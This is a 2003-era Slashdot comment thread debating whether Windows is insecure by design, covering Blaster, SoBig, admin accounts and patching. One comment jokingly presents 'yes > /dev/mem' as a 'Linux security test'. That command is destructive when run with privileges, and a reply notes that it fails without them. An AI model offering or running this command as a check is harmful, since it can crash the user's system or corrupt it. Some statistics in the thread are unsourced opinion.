The only way to get everyone patched (moreso than the auto-download and ready to install of Windows) is to force everyone to patch. However, there would be several dupes on slashdot about how our rights are being taken away and how Microsoft can look into our computer. A step further, if people started using Linux, you might see the same thing with Linux...

Re:95% a target perhaps?

[koniosis]

Its not Microsoft's fault, in XP when you install, the first thing it does it setup and Admin account, then ask you to setup "User" accounts which should be used, in place of admin. The only problem is that users who run Windows generally don't care for security, and so don't care about whether there an admin or not.

Re:95% a target perhaps?

[bl4ckfly]

Agreed as well.

Obviously, Windows is the number one OS in the world, thus the number one target by the blackhat community. There are plenty of ways to exploit Linux and other Unix systems, but what is the point? The best OS to corrupt is the one used by the most people. If someone writes a great worm that trashes Entourage on Mac OS X, great. The less than 5 percent of the computing world will be in pain for a bit, but that is not the point of security exploits. People want to cause world wide corruption, so Windows is the obvious target.

Re:95% a target perhaps?

[deputydink]

Funny how 95% of PC users have Windows, I wonder why a Virus writer would want to target Windows??!? Perhaps that is why so many exploits are found, because people are targeting it religously, start targeting Mac and Linux as much and see who is insecure

Actually, virus writers write virii targetting windows machines because windows machines are easy targets, not because there are so many licenses sold.

According to Netcraft's site survey only a quarter of active sites run Windows leaving the bulk of the public internet running on *nix.

I suspect much of the 95% of PCs you speak of are safely walled up in institutions, schools and corporations private networks, which are generally out of scope for a worm like blaster to target.

Now koniosis, what you should impress you is that *nix's run the majority of public sites on the internet, (those sites most easily attacked, i might add) with a marked minority of serious compromises as compared to Windows. More sites, less bugs. Simple.

Finally, only a Microsoft employee could think that its justified that the amount of embarrasing code compromises grow proportionally to desktop marketshare.

Re:95% a target perhaps?

[Borg_5x8]

Rob, save the moderators time and add the option "-1, unbiased view of Microsoft" -_-

Re:95% a target perhaps?

[koniosis]

Trolling and Flamebait are what you get if you make any kind of Windows Defence on ./ or balanced view, shame really.

Re:95% a target perhaps?

[justsomebody]

C'mon, get a reality check.

decent firewall script
For common user, redhat-config-securitylevel or menu Applications - System Settings - Security Level (enter administrator password) Choose between No, Normal, Maximum, Normal has proven to be sufficient for average users

download the latest patched kernel
Click Red asterisk that's blinking in your left corner. Click Launch up2date (enter administrator password) - Next - Next - Finish

In linux you have far more control over the system and can do far more damaging things, as its less restrictive than windows
Yes, I agree, but only when I'm root. When I'm using my user account system is far better protected. Again user don't need to know what console is.

so you can't say windows doesn't stop users being stupid because linux doesn't make an effort to either
Actualy it does, if you read what I answered

To protect your self from posting stupidity, try running system before you wanna join the critics.

And yes, there is a major difference

When you set up Windows you start as Administrator. Most people even without password. First user that you create is still administrator and again there is a possibility to have no password

When you set up linux, you MUST enter administrative password that can't be blank, but redhat starts firstboot script on first login. Here you MUST enter your username and password, by the way, default password length is 6 characters

By the way I'm available to your next comments

Re:95% a target perhaps?

[agent+dero]

This is _sort of_ true

If you recall the days of 68K macintosh, and Windows 3.11, there were quite a few macintosh virii.

Market share has gone down, while the emotions towards the OS have changed.

A much much larger percentage of Windows users _hate_ Windows, while more mac users love macs, that's why they chipped out for them.

In a sense, it's true

The old DOS/Windows had security as a pretty secondary concern, it was just about getting things to run and not crash a lot of the time. NT/2K/XP is much imrpoved, but it still suffers from this legacy. For example, it's still difficult to run users in non-Admin roles because some applications expect the user to have full Admin rights. Only when most of these applications are update will the ability to use real user security settings become practical.

Re:In a sense, it's true

[manly_15]

If every software maker followed these Microsoft specifications Windows would be a much better operating system. A good example of a broken app is Palm Desktop. First of all, it only works with one user. Second, to install it, you have to give the limited user admin rights, install it, and bring them back down to limited rights. It's the same for Documents To Go. Talk about a PITA - and notice that neither of the apps boxes have the Windows logo on them.

Re:In a sense, it's true

[iCEBaLM]

My point is, don't dog on Palm for creating a program to MS spec years ago and not wanting to "update" because MS changed the spec and they don't want to lose all their third party vendor support.

Quick linux security test.

To test if your linux box is secure, press alt f2 to open up the run dialog, then type

yes > /dev/mem

.

If nothing happens then you have a reasonably secure linux box.

Re:Quick linux security test.

[Negative+Response]

I just did it and the result is:

zsh: permission denied: /dev/mem

You know, being funny aside, you just demonstrated one excellent point: Users should have enough rights to have work done, but not so much to easily screw up the system. Don't use root privilege in vain!

Re:Quick linux security test.

[donnz]

Oh, ha, yes, funny.

Now connect your Windows PC to the internet and wait for someone in Khatmandu to type "format c:".

The real issue however is that Windows * is still using a lot of code from DOS and Win3.1 for all sorts of shit. Those were the days, remember, when personal computers were just that, personal.

*nix has a pedigree in networked computers. So whilst mistakes are made in code of each system, always, one paradigm is always going to be more secure than the other. Until MS really, really and truely re-writes its OS. Shame the article misses this point by such a wide mile.

Re:Quick linux security test.

[1010011010]

I did an strace of a (brand new, designed-for-XP) program on Windows XP recently. The program changes the mouse cursor when you mouse over certain UI features. According to strace, Windows XP uses WOW (windows-on-windows -- Win16 emulation!) to do this. To this day. In their latest operating system release. Sheesh. The Win32 call thunks down to Win16 emulation, even on XP. How busted is that.

Plus, windows thinks that just because a file's name ends in ".exe" or some other magical combination of letters, that it's a program and should be loaded and run. Over here on my Linux systems, I can deny execute permission to entire filesystems (such as users' home directories), and in any case, Linux doesn't assign every random attachment and download execute permission by default.

Re:Quick linux security test.

[Nakoruru]

Windows also allows you to deny execute permission to entire filesystems. It allows much more fine grained control than unix.

The latest version of Microsoft Outlook can be setup so it doesn't even allow me to save an 'unsafe attachment', much less run it. I have to hack around in the registery to re-enable it, or ask the sender to resend it in a zip file.

Choice

[Spleener12]

I have one question: If you don't trust this company, why did you give it your money?

In my case, because Virginia Tech's CS department requires us to have XP Pro. The people who don't trust MS use Windows because they have to.

Re:Choice

[Exitthree]

I'm really not trying to be a troll here, but if a CS department requires a specific type of operating system (and probably the software that runs on said OS) in order to teach, then it's probably not worth the money to attend. Sure, learning to program with Microsoft's code du jour might help in the short term, but nothing beats teaching fundamental computer science principles in the long term.

What happens when the next big thing comes along and all the CS grads are stuck with C# as their sole reference point?

Re:Choice

[mjmalone]

If you read the computer requirements for computer science majors you will see that they also require to you be able to run mandrake linux.

In FAQ they respond to the question "Do I have to use Windows XP Professional on my computer?"

Certain assignments or software in some classes may require the use of Windows which is available in the Computer Science undergraduate labs. If you do not run Windows on your computer, you will miss an educational opportunity to learn Windows administration, which is a marketable skill. The Department will not check that you are, in fact, using Windows XP Professional. However, if you choose to run Windows 95 or 98, you will almost certainly experience increased difficulty in the programming classes.

The requirement is more of a guideline for people who don't know what to get. And the original poster is probably just a karma whore who doesn't know what he/she is talking about.

'windows attacked because popular'

[gl4ss]

the author makes nice (partial if you may)rebuttal of this myth, and also points to something to back it up like the number of open ports that create potential possibilities for holes,and that are for services that are default enabled, yet shouldn't be used in hostile environment(and how ms does nothing about it, and how xp was supposed to be more secure in matters like this). and frankly i haven't heard of non-hostile environment involving more than 10 people in a deserted island with lots of food and jolly sunshine happiness to keep them away from their computers.

-

Re:'windows attacked because popular'

[Darth_Burrito]

I think there's a lot of very valid popularity related reasons that cause Microsoft to be subjected to a higer percentage of attacks per vendor than other systems.

First, consider who Microsoft based systems are popular with: home and office users. Often, as in the case of SoBig, the users are as much a target as the operating system.

Second, because Microsoft is so popular and because they have a history of problems (such as bluescreens), they have become extremely unpopular, particularly among that certain segment of the population that might create and unleash viruses. While I know of many corporations//organizations whose capacity for evil greatly exceeds Microsoft's (Monsanto, Phillip Morris, etc), I know of no company so hated by so many all over the world.

Finally, when you consider the amount of viruses, worms, and the like that affect Microsoft versus a nix, it is important to remember that Microsoft is an entire homogonized platform in and of itself. The misc services, the ftp server, the smtp server, the web server, the database server, the mail server, etc are all made by Microsoft and many of these components are standard, especially in a microsoft shop. Compare this to a nix where people more readily pick and choose each of the above components. If you are writing a multi-vector worm like Nimda, windows represents the easiest target because there are a lot of standard uniformly implemented services which are virtually guaranteed to be there. If you were writing the same thing for a Nix, you could target Apache, sendmail maybe, and then what? There's so much diversity in the Nix world that it makes it more difficult to target.

I am not excusing Microsoft's security problems in any way. I just believe that the popularity of Microsoft and its platforms has had an extremely significant effect on the number of times they are targetted, and as a result, compromised.

This is a good first step.

[JessLeah]

Perhaps now we should try to get other "mainstream" media entities to cover stories with this sort of angle... such as:

* The New York Times
* CNN
* USA Today
* The Wall Street Journal? (Yeah, it's a long shot, but...)

Does anyone here have contacts with any of these companies?

Re:This is a good first step.

[JessLeah]

Listen, ANYTHING that speaks out against current prevailing trends is generally "news" to the majority of Americans. The trend in recent years is to "go with the flow" of the status quo; most people I talk to about Mac OS, Linux, etc. either (A) know nothing about them, or (B) think Windows is so much better (client-side and often server-side!) than both of them.

Unless some press that runs contrary to this prevailing notion gets into mainstream companies...well, Windows will probably continue to be stuffed down everyone's throats by a majority of uninformed users and managers.

Biased report!

[lakeland]

I wonder how much money RedHat slipped the Washington post for that one...? *g*

Linux users

[jabbadabbadoo]

"But nobody with a Mac or a Linux PC has had to lose a moment of sleep "

Like a Linux PC owner sleeps anyway....

Re:Linux users

[ceejayoz]

They do sleep, they just sleep alone. ;-) joking, joking...

Re:Linux users

[ATMAvatar]

Better to sleep alone than to get W32.STD :o

what about Gentoo?

"Windows is better than most operating systems at easing the drudgery of staying on top of patches and bug fixes"

emerge -u world
how _hard_ is that?

Re:what about Gentoo?

[rampant+mac]

"Windows is better than most operating systems at easing the drudgery of staying on top of patches and bug fixes"

emerge -u world how _hard_ is that?"

First off, I'm a Mac user but fairly experienced using Unix/Linux....

The Mac is better than most opertaing systems at easing the drugery of staying on top of patches and bug fixes...

*clicks software update*

Do you really expect newbie users of Linux to understand "emerge -u world" by chance? If so, there is MUCH work to be done to Linux's software update model. Sure the emerge command may seem trivial to most advanced Linux users, but what can be done to expand this simplicity towards the consumer market?

Re:what about Gentoo?

[boredMDer]

Do you really expect newbie users of Linux to understand "emerge -u world" by chance?

If a user is using Gentoo, unless the system was, for example, installed for them, they have to and undoubtedly will know that 'emerge -u world' updates the system to all latest program versions, bugfixes, etc. One must use 'emerge' several times during the installation process alone much less to install any other software from ports after installation is completed.
During installation 'emergee -u system' is run as well (or emerge -u system? I forget which...)


Do you really expect newbie users of Linux to understand "emerge -u world" by chance? If so, there is MUCH work to be done to Linux's software update model. Sure the emerge command may seem trivial to most advanced Linux users, but what can be done to expand this simplicity towards the consumer market?

You make it sound as if you think that 'emerge' is installed on all distros, where in fact it is used as the sole package manager in only one, Gentoo (portage can, however, be installed on other distros...see gentoo forums to see how). Again, a Gentoo user is essentially required to know how emerge works to use their system.

Re:what about Gentoo?

[Gilmoure]

Hell, not only does OS X patch itself and Apple apps (Safari, iMovie, iTunes, etc.), it'll even path Internet Explorer with a security patch. This is accomplished via a pop up window with a list of updates to install, check boxes next to each one, info buttons next to each one and a single install button. Nice being able to que all the installs and set them d/l'ind and running. After doing a restart, if necissary, it'll check again, to see if there are more patches that are now needed.

Corporate Blinders

[N8F8]

What baffles me is that even with all this evidence for the need for operating system diversity in the corporate realm both corporate America and the US government are eliminating anything non-Microsoft. Lemmings.

What is it going to take? Ships sinking? Trains being derailed? Satellites dropping out of orbit?

Re:Corporate Blinders

[vacaboca]

"all this evidence for the need for operating system diversity in the corporate realm"...?

That seems to be a rather easy thing to say if you're not actually trying to manage a business with a large, complex interconnected system of technologies... having spent a rather painful amount of time (actually, more like an amount of rather painful time) in very large companies (35000 PC users at all levels of use), I have to say that a desire for OS diversity is far from an obvious choice. I'm not saying it's a bad idea, just a potentially unpractical one in many real corporate situations.

Working with the single devil you know as opposed to a vast army of individually varied devils may be preferable, at least in theory.

Re:Corporate Blinders

[mjmalone]

What is it going to take? Ships sinking? Trains being derailed? Satellites dropping out of orbit?

Major power outages in the northeast!? Entire DMV operations being shutdown!? Massive denial of service attacks cripleing the internet!? E-mail viruses bringing hundred thousand dollar mailservers to their knees!?

Good idea

[Rosco+P.+Coltrane]

Here's a modest proposal: Microsoft should use some of its $49 billion hoard to mail an update CD to anybody who wants one. At $3 a pop (a liberal estimate), it could ship a disc to every human being on Earth -- and still have $30 billion in the bank.

Please Microsoft, use CD-RWs. I already have a wall covered with silver AOL CDs ...

Nah...

[Faust7]

Here's a modest proposal: Microsoft should use some of its $49 billion hoard to mail an update CD to anybody who wants one.

The sorts of people that would think to order such a CD in the first place are likely already patching their machines. Others will get the CD and misplace it, forget about it entirely, or mistake it for something like an AOL disc and toss it in the trash.

Re:Why was this posted?

[Audity]

It was posted because people have been saying for a long time that windows is insecure, but Joe Shmoe computer user won't know that (you mean there's computers that don't run windows?) until it gets some attention in the mainstream media. This is the media attention a lot of linux geeks have been waiting for.

Intelegence

[sub7mage]

The only reason these worms can spread is because of the lack of basic computer intelegence of the average user. i have had windows and used the internet religiously for years and have never gotten a worm on my box.

So basically what i'm saying here is that its not always the operating systems fault, even though i think windows is insecure it gets to much shit for it.

Obligatory Question and

Obligatory Response:

The argument sort of breaks down when you talk about webservers, with Apache solidly in front with % usage, yet it's the smaller-target MS offering that is the one hit with exploits.

There's something more fundamental about the differences in security -- yes, MS is a bigger target, but that doesn't mean that it can't also happen to be the easiest target (and it is).

Re:Obligatory Question and

[Overly+Critical+Guy]

Windows still has 95+% marketshare. See how secure Linux is then.

MS Bashing

[mOoZik]

This is a bit unfair. Microsoft identified the problem and offered updates long before the worm hit the streets. Microsoft cares about the security of Windows, but it was the stupidity of the users which led to the compromise of their systems. If a Linux hole is found, nearly ever user would update to fix the change, because the average user of Linux knows what putting it off may entail. The average Windows user does not have the same computer knowledge, and hence, Microsoft gets the blame. Just another MS bashing is what it is!

Re:MS Bashing

[cduffy]

There're two issues:

1. There's this bug users didn't patch for

2. The system's default configuration made almost everyone vulnerable being attacked via the bug, even if the user isn't actually making use of the buggy service.

On item [1], yes, there's a really strong argument that it's the user's fault. On item [2], though, it's pretty damn clearly the vendor's negligence.

Actually mac and linux users were affected

[jdigriz]

Some of us alternative OS users were actually affected by the virus, even if we weren't infected. In addition to the Net slowdown, the friggin SoBig.f virus forges emails. So if you have any windows using acquantainces, or even people who received a forward with your address on it, the SoBig.f virus will cheerfully send out copies of itself purportedly from you! It doesn't just stop at the address book either, but allegedly scans documents on the drive to harvest addresses. Evil, evil thing. So, no computational loss, but potential harm to reputation, even though it's easy to prove via the headers that it did not originate from you, the vast majority of those windows users who get infected with emails bearing your From: line don't know a header from a hole in the head.

Larger Target

[Raven-sama]

Linux and MacOS users are, let's face it, in the minority compared to Windows users. Granted Windows most likely does have moe security flaws than these other OSes, but the main concern here is that virus writers will target the OS that will cause the most damage (or that they have the most experience with) and that will almost always be Windows.

Even if all the known exploits in Windows were patched, all it would take it one more for another virus to do something like Blaster or Slammer. On the flipside though, something like that could just as easily happen to Linux if an exploit were found, it's just that no one bothers to write viruses that take advantage of it.

Correct Me If I'm Wrong but....

[cmay]

If someone emails you an exe, and you run it, and it does something to your computer, that isn't exactly Microsoft's fault.

I guess sobig is a .pif and so its kinda confusing to some people, but I don't think you can group SoBig in with other security holes that Microsoft has.

Re:Correct Me If I'm Wrong but....

[Politburo]

Why are attachments allowed to do *anything* on the computer?

Uhh, because some of us know our way around well enough to get programs from people that we want to run. Saving to HD and then running doesn't change a thing. To say you shouldn't be attaching executables is silly. People should be safe: know who sent them the mail, know what it is they are running, and run an up to date virus scanner, as well as keep their system patched.

If you are talking about automatic running of attachments, that is a different story, but I want my computer to do what I tell it to do.

Re:Correct Me If I'm Wrong but....

[Keeper]

Great. I'll let you spend the 6 months it'll take to teach my mom what an "extension" is, what it means, why she should care, and then the differences with all of the nitty gritty details (why the same files have different extensions (htm, html, shtml, etc), why pictures have different extensions (jpg, jpeg, gif, tiff, tif) and so on.

Fact of the matter is extensions shouldn't matter -- they're just a legacy artifact of 8.3 filenames and commandline interfaces. Macs have worked just fine without them for years. Unix system use a hodgepodge of extensions, mainly to represent what content a file contains to a person on the commandline (the same effect is derrived by giving files icons in a GUI). On a unix system I could have a file named foo.jpg -- doesn't mean it's a jpg. In fact, it could contain a binary and could be executed if the right bits were set on the filename. Depending on a file extension to convey an accurate representation of it's contents is just asking for trouble.

Re:enough with the virus hype

[craigmarshall]

I currently run Windows XP (unpatched, no virus-killer) and GNU/Linux machines behind a GNU/Linux firewall/router. I have never been *infected* with anything. If you're stupid enough to set Windows Explorer to "hide the extension of known file types", and to not know that a .scr file is just as executable as an .exe, and to not run a decent firewall then frankly, you deserve to be infected by the latest and greatest virus.

--
Craig

Re:Apple and Linux systems are insecure too!

[David+Gerard]

And we certainly see this on the Web, where Apache on Linux greatly outnumbers Microsoft IIS on Windows. Oh wait, no we don't.

Re:Market Share?

It's be already said, but I'll say it again: Apache is the most used web server on the internet, yet most web server worms are for IIS. Following your logic, Apache should be exploited every couple of weeks.

Re:Market Share?

If you read the article, the author explains why
it's not just the sheer number of windows
users that's the problem. As an example, there's
the number of ports open on Windows XP (5),
vs. OS X (0) by default. You really do have
to take into account the design of the operating system. Windows is just too easy to hack compared
to the other OS choices.

Johnny

Re:Market Share?

[David+Gerard]

And we certainly see this on the Web, where Apache on Linux greatly outnumbers Microsoft IIS on Windows. Oh wait, no we don't!

Re:Market Share?

[Homology]

If 80% of the computers on the Internet were running OS X or Linux don't you think there'd be more Mac and *nix malware?

I find it much easier to secure a Linux/*BSD box than a Windows one. Even though I use Win 2000 daily as a programmer. I'm pretty sure I'm not alone in that predicament.

Just keep in mind that a large part of the internet infrastructure does not run Windows, but they (the servers) still seems to do okay, apart from the odd sendmail/bind/openssh bug ;-)

Re:Apple and Linux systems are insecure too!

[LostCluster]

The design flaw that the author is pointing out is that administrator-only functions like RPC and the administrator's message boxes are turned on in a default installation, when the world would be better off with such features in the OS but defaulting to an off position and only running the associated software if the user indicates they want the feature on.

This is not a design flaw that Apple and the various Linux distributors are immune from, just that they seem to violate this rule with less frequency. Let's face it, if Windows shipped with RPC turned off by default, Blaster would have a much smaller impact than it has now.

As for SoBig, there's really nothing preventing a SoBig for Mac or Linux. Afterall, all you need to do is trick the user into executing a program that isn't what they think it is, and then read their address book file. The only complicating factor is that there's an overwhelming market share for the Windows Address Book being used, that it's the only place most virus writers bother to check for addresses to use. In order to make such a virus with the same impact on another operating system, they'd have to check the address book location of about a dozen programs... bloatware for virus writers.

Re:enough with the virus hype

[craigmarshall]

And in cases like these (stupiduseritis?), it doesn't matter which operating system you choose to use, you almost certainly won't have configured the machine properly from a security standpoint.

--
Craig

Re:Why was this posted?

[brokencomputer]

I agree. The Washington Post is a very well known newspaper that many people get. Even my father(who subscribes to WP) read the article this morning and showed it to me because he thought I might find it interesting. He isnt the type to read stuff like slashdot. Just a note..I saw it at news.google.com this morning.

Re:It's not Windows' fault

[lkaos]

The recent DCE/RPC vunerability exploited MS's DCOM implementation residing on the end point mapper port using raw DCE/RPC over TCP.

This has nothing to do with Unix and certainly isn't a standard (hell, Samba doesn't even support this). This was totally a MS-original.

A lot of the http virii are based on MS-extensions or broken non-standard behavior of the MS clients.

If MS has followed what you refer to as "obscure unix standards", this wouldn't be an issue. Despite what you may thing, Unix systems were designed with security in mind whereas Windows was designed as a user-operating system.

Create a Windows clone, loose a zillion dollars!

[Gonoff]

If someone succeeded, MS would turn their entire corporate attention towards completely destroying them. They would (mis)use copyright, DMCA, criminal law and anything else they could get their greasy fingers into.

One thing that has saved Linux (so far) is that they can't figure out who to aim at. All they can do is bribe lawmakers and promote FUD. They know that if they take out Redhat, someone else would have the code within seconds anyway.

quoth Marc Andriesen

[Crashmarik]

Regarding IE and Active X.

Its nothing but a virus delivery system.

That was about 8 years ago. Microsoft destroyed netscape and aside from some humorous footage of Bill Gates lying under oath nothing was done about it.

Now someone in the mainstream press has actually done their homework. Are we supposed to be impressed ?

Bad design 4 Security - Bad 4 Servicing ...

[leoaugust]

Not only are the security implications horrendous in the MS products, but servicing them is a nightmare ....

This story just caught me at a bad time ... I have been trying to do a file/printer sharing between 2 computers running Win 2000 Prof and Win XP Prof using a hub. You would think it would be plug and play, and a little bit of configuration - and that is how I set out my cost estimates for a small business that wanted me to do it for them ... big mistake ...

It is 3 days past now. I have read probably 100 + articles to understand the security implications for these windows products .... Used all sorts of keywords in google to get many articles to see how the damn networking is done in the first place. And I am now thoroughly confused, tired, and am spending a lot of unpaid hours getting this damn networking done. FOR GOD's sake I am trying to network two products from the same company ... How could MS screw it up and make it such a nightmare .... and do such dumb stuff as not turning the security features on by default so that I don't even know what I am exposing, all the patches that are being issued faster than I can download ...

1. I have both the lights from the two computers in my hub flashing - thank god.
2. I can connect via one computer to the internet - praise the lord.
3. But I can't get the file/printer sharing done yet ... - Forgiveness is divine.
4. And as the feed is provided by a cable internet operator, which has a pool of computers of its own, I am not even sure of what is secure and what is not - Ignorance is a bliss.
5. And I have lost a lot of money and time ... Lord, give me the strength to forgive those who do not know what they are doing ....

Re:Bad design 4 Security - Bad 4 Servicing ...

[Politburo]

Lord, give me the strength to forgive those who do not know what they are doing ....

Can he give you the strength to forgive yourself?

Running always as root....

[LostCluster]

The article takes a cheap shoot implying that Windows users always run as Administrator, the Windows equal to the all-mighty root, while Mac and Linux users usually get this right and reserve their root use for important stuff, but spend most of their time on a limited user account.

Microsoft had this bad in the entire Windows 9x kernel OSes because there never was any concept of a restricted user... everybody was an Admin on those boxes. Insecurity at its worst, but it was always thought of as a single-user OS, if you wanted a secure user environment you were supposed to pay for the Windows NT-based OS of the time.

Windows XP, afterall, is a Windows NT-based operating system so half of the problem is now solved. Microsoft's consumer product finally has a restricted mode. The problem is, there's still a user problem... most people use an administrator account as their primary, sometimes only, Windows logon. So, even though the software has caught up, the users haven't.

Re:Running always as root....

[Politburo]

Well, the OS software has caught up. The problem is that not all of the application software has caught up, and that is the main reason why many people (including myself) continue to run 2000/XP as administrator.

OTOH, I always keep my (and my family's, who also run as admin) system patched, and have never had a problem with any of the MS problems talked about here. It's so painfully simple to avoid these problems that it's not even funny.

Re:Running always as root....

[Sexy+Commando]

IMHO WindowsXXYY will never be secure until Windows introduces the concept of the sticky bit on files -- but are there patent problems with that?

Have you ever heard of the term "NTFS"? go to an XP machine and see how C:\WINDOWS\Temp permission is set up. Your saying that Windows has no sticky bit-like mechanism is like saying *NIX doesn't hae ACL.

Comment removed

[account_deleted]

Comment removed based on user account deletion

Insecure by Design

[Tony-A]

I didn't have ANY trouble with SoBig.. or Blaster.. why, because I didn't patch my system. Oh a few things like clobbering Windows Scripting Host and setting things so I see the file extensions, but hardly enough to call it "secured". It's insecure. I know it's insecure.

No one sat around a conference table in a code review and said.... you know what.. this isn't insecure.. we need to change that.
But did anyone ever say "this isn't secure.. we need to change that."?

In the design balance between fundamental security and "user experience", has any weight ever been given to security in the design phases? Surely Microsoft does something they call "design" for this stuff.

Only Partially True

[EXTomar]

While it is true that a lot of these things rely on social engineering, the other part is why does the OS allow the user to do these things in the first place? If you don't want users to do something destructive, why offer them the choice?

One of the first rules of design seems to be lost on MS designers. If you don't want users to do something then don't offer it as an option. You can pop up dialog after dialog warning users like this:

Do not click 'yes'. If you click 'yes' will crash the machine. Only click 'no'.

[Yes] [No]

How stupid is it for a user to click "yes"? How stupid was it for the programmer to put the "yes" button there?

Yet in MS program after MS program they tell you something is dangerous and allow you to do it anyway. I guarentee as long as applications allow this some malicious hacker will use a little word play or social engineering to allow them to do something destructive.

I really want to throttle the person at MS who tried to get people to believe computers are as easy to operate as toaster ovens. Computers are complex machines. Hiding the fact from the user is not only dubious but dangerous.

Not exactly...

[Dimensio]

Apache is more deliberately used than IIS. IIS, however, has a very widespread install base amongst clueless users who don't even realise that they're running it, thanks to Microsoft's boneheaded install procedures.

Best way mixed platforms for reliability ....

[OldHawk777]

I strongly advocate mixed platform networks. I consider Linux and/or BSD as the best for most backbone/critical services/systems, but MS Windows to backup the backbone/critical.
In an office environment for the users in the past I could only advocate Apple and MS software OS+Apps. Late last year I added Linux+GNU desktop/workstation OS+Apps for a mixed platform office environment. Businesses and government should consider letting experienced users [AKA: Geeks/Gurus] select their own OS+Appps desktop.
The reason no one ever supports the mixed network devices/switches/... (3Com, Cisco, Lucent, ...) and platform from Ma-Bell to the user is that the complexity of configuration, security, operation, ... help-desk, network/server admin ... everything would be an expensive pain to support, but (unless power-failure/outage) web/email/ftp/VoIP/VTC/ ... services from Ma-Bell to the user could be maintained during cyber-conflict activities. Someone in the office would always be able to access email, websites, ....
For critical/emergency business/government systems and offices the complexity should be able to provide critical services for utilities, command-post, emergency agencies, .... Just a few critical (maybe one) networks and offices would require this mixed-platform configuration in business and government.
Strict adherence to protocols, standards, and configuration would allow business and government to communicate and use www/internet/intranet services. .....DB2, My-SQL, MS-SQL, ... other considerations.
Letting a one version OS attack (frequently MS) cripple your business, critical infrastructure systems, and/or part of a major government agency like NASA or DoD is PPP.

Someone Who Gets It

[MBCook]

Everything I've heard on TV and Radio that's been more than just "There is a new virus" that has an attitude that I just can't stand. A thing I heard on NPR put it perfectly. Basically the attitude is that this is the way the computer industry is, and maybe they should do something about it.

Computer industry? WHAT COMPUTER INDUSTRY? The VAST majority of these big viruses exploit who's products? All togerther now: MICROSOFT. This isn't Apple's fault, Macromedia's fault, iD's fault, or anyone else. These things are almost all MICROSOFT's. Finally someone in the media seems to get it.

Re:Someone Who Gets It

[phillymjs]

And if 90% of the users used Apples, 90% of the virus would target Apples.

Bullshit. There are about 50 Mac-specific viruses, as opposed to over 70,000 Windows viruses. Apple has ~5% marketshare, and a slightly larger installed base, yet it is targeted by only ~.07% of the known viruses. Of those 50 Mac viruses, most are either extinct or so old that they wouldn't function on versions of the Mac OS more recent than 7.6. I've been using Macs and making a living supporting them for 12 years, and I've seen exactly 2 viruses-- both non-malicious. If there's a Mac OS X-specific virus out there yet, I haven't heard of it.

No virus or worm will ever have its way with a Mac the way Windows worms rape Windows PCs, period. All unnecessary services and ports are off by default, and if any suspect code tries any funny business, the user gets a dialog asking "Should I run this?"-- not a green light to do whatever it wants from the OS.

If Microsoft went away tomorrow and Apple took 100% of the market, there would still be nobody writing successful Mac viruses, because the gaping security holes just aren't there to be exploited. Since OS X 10.2 came out, Apple's security update frequency is enviable-- less than once per month.

~Philly

Re:It's not Windows' fault

[Limburgher]

These are not failures of the security of the protocols. These are failures of the MS implementations of these protocols. Both IIS and Apache use http, and yet one is more secure than the other. Both Exchange/Outlook and Sendmail/(insert favorite MUA here) use smtp, and look at which one spreads virii like the clap. To blame these 'obscure' standards is like blaming the wheel for problems with Ford Explorers rolling over. It's not the standard, it's the piss-poor impementation.

Even some Linux default installs have security holes. It's all in how it's done, not what it's done with. Are we supposed to throw out everything written in C now, too?

Nice to see such a mainstream source getting on MS

[thedbp]

I think my favorite part in the article is when the author suggests that MS should use their massive cash pile to mail out a CD of updates to every single customer that wants one. Considering how many CDs AOL sends out (and yes, I know they are bleeding money), wouldn't it make sense to partner with AOL, who is already producing discs, and make them multi-session, so that MS could use the already pervasive CD distribution systems in place to get updates out?
I can't believe no one thought to suggest this before. And if MS was REALLY SERIOUS about making security their #1 priority, it would be a pittance to part with and give their customers a much-needed sense that MS actually does care about their customers.
The question is, do they really care more about the customer or the bottom line?

Re: Windows Is 'Insecure By Design,' ...

[Dunark]

A lot of the recent problems could have been prevented if people had installed the available patches. However, the EULA's that one has to agree to while installing the patches are downright frightening, and Microsoft keeps making them worse.

I wonder how many people skip the patches because the EULA's are so obnoxious?

Re:Ummm... AGAIN, WHY NOT WINDOWS LINUX????

[croddy]

oh yes. they could call it MSUX.

Re:enough with the virus hype

[thedbp]

This is really an awful way to think about a consumer base that doesn't understand some basic tenants of computing. I've known plenty of Windows users that think 3.5" floppies are hard disks because the casing is, well, hard. To expect them to catalog file extensions in their heads as well is ridiculous. Obviously you are a more savvy user as you have Linux based machines and a firewall set up.

Not everyone has the time/expertise/desire to learn that much about computing, and that's OK. If everyone were a geek, you'd have no one to bitch about, would you?

Re:Insecure by Design

[Genjurosan]

But did anyone ever say "this isn't secure.. we need to change that."?

I don't know, nor do you, or the Washington Post. That's my point. This guy is making this statement without any facts, just assumptions.

In the design balance between fundamental security and "user experience", has any weight ever been given to security in the design phases? Surely Microsoft does something they call "design" for this stuff.

I don't know about MS. Can you say that they don't? I for one know that my non-software company which has an IT department that watches the actions of MS a lot, has an information risk management team that looks for security holes in all in-house and purchased software before implementation. Would you care to assume that MS gives weight, or doesn't give weight to security during the design phase? Or would you care to not assume, since all the facts are not available?

Re:MOD PARENT UP, more..

[SoftwareJanitor]

Where you are wrong, and the Washington Post is correct is that Windows doesn't have to be intentionally flawed to be 'flawed by design'. Something can be flawed by design as far as security goes just in neglecting to design a proper security model to begin with. Windows is flawed because it wasn't designed to be secure from the beginning, and newer versions, even those written after Microsoft started to become more aware of the need for security, have been hamstrung by their need to retain backwards compatibility with older versions and for software written for older versions which in many cases just won't install and/or run correctly on a properly locked down installation of Windows. Whether Microsoft intentionally designed in security flaws isn't what matters, what matters is Windows, as it is currently designed and implemented has some inherent design flaws which make it less secure than it needs to be. Among them are the fact that so much Windows software relies on being able to write to system directories (to add DLLs, etc) to be installed, which leads most people to allow too many users to be able to access too many files. Another is the fact that Microsoft built in scripting which allows too much access to low-level functionality (in other words, it doesn't run everything in a restricted sandbox) into just about everything, including the email clients and office software most Windows users depend on. Another is the fact that executability is based on file extension and not by permissions, if it wasn't, then people wouldn't be able to accidently execute malicious downloads so easily. This problem is compounded by the fact that by default most Windows facilities and software likes to hide the file extension.

The Washington Post article is not a troll or flamebait, it is a very necessary wake up call to the average Joe Windows users. If more of them had patched their systems and used mail clients other than Outlook or Outlook Express as you have, then these viruses/worms wouldn't be such a big problem. Without the mainstream press letting these people know, they will not get the message.

Re:Apple and Linux systems are insecure too!

[OmniVector]

Actually that's incorrect. the reason most email/address book viruses spread so fast and cause so much havoc is because of Outlook and Outlook express -- which are ENTRENCHED in the business sector. I told my boss the other day that there's an email client that doesn't have these problems (Mozilla Mail) and his first question was how much does it cost to license. Managers think nothing is free, and if it is it's too good to be true -- and that, just isn't true.

